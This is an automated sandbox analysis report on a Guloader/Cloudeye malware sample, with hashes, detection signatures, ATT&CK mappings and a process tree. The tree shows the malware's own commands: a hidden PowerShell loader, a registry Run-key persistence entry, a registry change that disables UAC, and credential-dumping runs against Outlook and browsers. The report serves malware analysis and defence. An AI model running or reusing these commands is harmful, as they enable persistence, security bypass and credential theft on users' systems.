Analysis
- max time kernel: 149s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20240709-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 10-07-2024 01:26
Static task: static1
Behavioral task: behavioral1
- Sample: 4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe
- Resource: win7-20240704-en
Behavioral task: behavioral2
- Sample: 4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe
- Resource: win10v2004-20240709-en
General
- Target: 4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe
- Size: 398KB
- MD5: b1c35e78f5d588430c4f534479def9f2
- SHA1: f787dd3327ca04361935f74867f76f16821db99f
- SHA256: 4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7
- SHA512: 5f78e6794ae313f5ca96c33fe0ecf0c882a18a93caa54bf92823ac42c5c753b6a98d4c77618de2b62cbc9d24e6e500272e4ffa7b25afff20b7e8349fc278a66c
- SSDEEP: 12288:9GkmNVhJhqnfP30YhNia+nv4tQD3W/P19QY:9GkmPh7qfPrsQeD3W/bd
Malware Config
Signatures
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
UAC bypass
Processes:
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
- behavioral2/memory/2516-72-0x0000000000400000-0x0000000000462000-memory.dmp (yara rule: MailPassView)
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
- behavioral2/memory/1908-69-0x0000000000400000-0x0000000000478000-memory.dmp (yara rule: WebBrowserPassView)
Nirsoft 3 IoCs
Processes:
- behavioral2/memory/1940-73-0x0000000000400000-0x0000000000424000-memory.dmp (yara rule: Nirsoft)
- behavioral2/memory/2516-72-0x0000000000400000-0x0000000000462000-memory.dmp (yara rule: Nirsoft)
- behavioral2/memory/1908-69-0x0000000000400000-0x0000000000478000-memory.dmp (yara rule: Nirsoft)
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
- wab.exe: Key opened \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
- reg.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ortyginae = "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\\Audiometeret\\').Rudolph;%Monopolizables% ($masturbated)"
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
- PID 2696 wab.exe
- PID 2696 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
- PID 2104 powershell.exe
- PID 2696 wab.exe
Suspicious use of SetThreadContext 4 IoCs
Processes:
- PID 2104 powershell.exe set thread context of 2696 wab.exe
- PID 2696 wab.exe set thread context of 1908 wab.exe
- PID 2696 wab.exe set thread context of 2516 wab.exe
- PID 2696 wab.exe set thread context of 1940 wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
- PID 2104 powershell.exe (9 entries)
- PID 1908 wab.exe (4 entries)
- PID 1940 wab.exe (2 entries)
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
- PID 2104 powershell.exe
- PID 2696 wab.exe (4 entries)
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
- PID 2104 powershell.exe: Token SeDebugPrivilege
- PID 1940 wab.exe: Token SeDebugPrivilege
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
- PID 2696 wab.exe
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
- PID 5116 (4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe) wrote to memory of 2104 (powershell.exe) (3 entries)
- PID 2104 (powershell.exe) wrote to memory of 2696 (wab.exe) (5 entries)
- PID 2696 (wab.exe) wrote to memory of 2348 (cmd.exe) (3 entries)
- PID 2348 (cmd.exe) wrote to memory of 1520 (reg.exe) (3 entries)
- PID 2696 (wab.exe) wrote to memory of 3708 (cmd.exe) (3 entries)
- PID 3708 (cmd.exe) wrote to memory of 1980 (reg.exe) (3 entries)
- PID 2696 (wab.exe) wrote to memory of 1908 (wab.exe) (4 entries)
- PID 2696 (wab.exe) wrote to memory of 2516 (wab.exe) (4 entries)
- PID 2696 (wab.exe) wrote to memory of 2624 (wab.exe) (3 entries)
- PID 2696 (wab.exe) wrote to memory of 1940 (wab.exe) (4 entries)
Processes
[1] C:\Users\Admin\AppData\Local\Temp\4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe (PID 5116)
    Command: "C:\Users\Admin\AppData\Local\Temp\4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2104)
      Command: "powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Program Files (x86)\windows mail\wab.exe (PID 2696)
        Command: "C:\Program Files (x86)\windows mail\wab.exe"
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetThreadContext
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe (PID 2348)
          Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\reg.exe (PID 1520)
            Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
            - Adds Run key to start application
            - Modifies registry key
      [4] C:\Windows\SysWOW64\cmd.exe (PID 3708)
          Command: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\reg.exe (PID 1980)
            Command: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            - UAC bypass
            - Modifies registry key
      [4] C:\Program Files (x86)\windows mail\wab.exe (PID 1908)
          Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\giryqlua"
          - Suspicious behavior: EnumeratesProcesses
      [4] C:\Program Files (x86)\windows mail\wab.exe (PID 2516)
          Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\jkfrrefcneq"
          - Accesses Microsoft Outlook accounts
      [4] C:\Program Files (x86)\windows mail\wab.exe (PID 2624)
          Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tekbrwqvjmibira"
      [4] C:\Program Files (x86)\windows mail\wab.exe (PID 1940)
          Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tekbrwqvjmibira"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
Downloads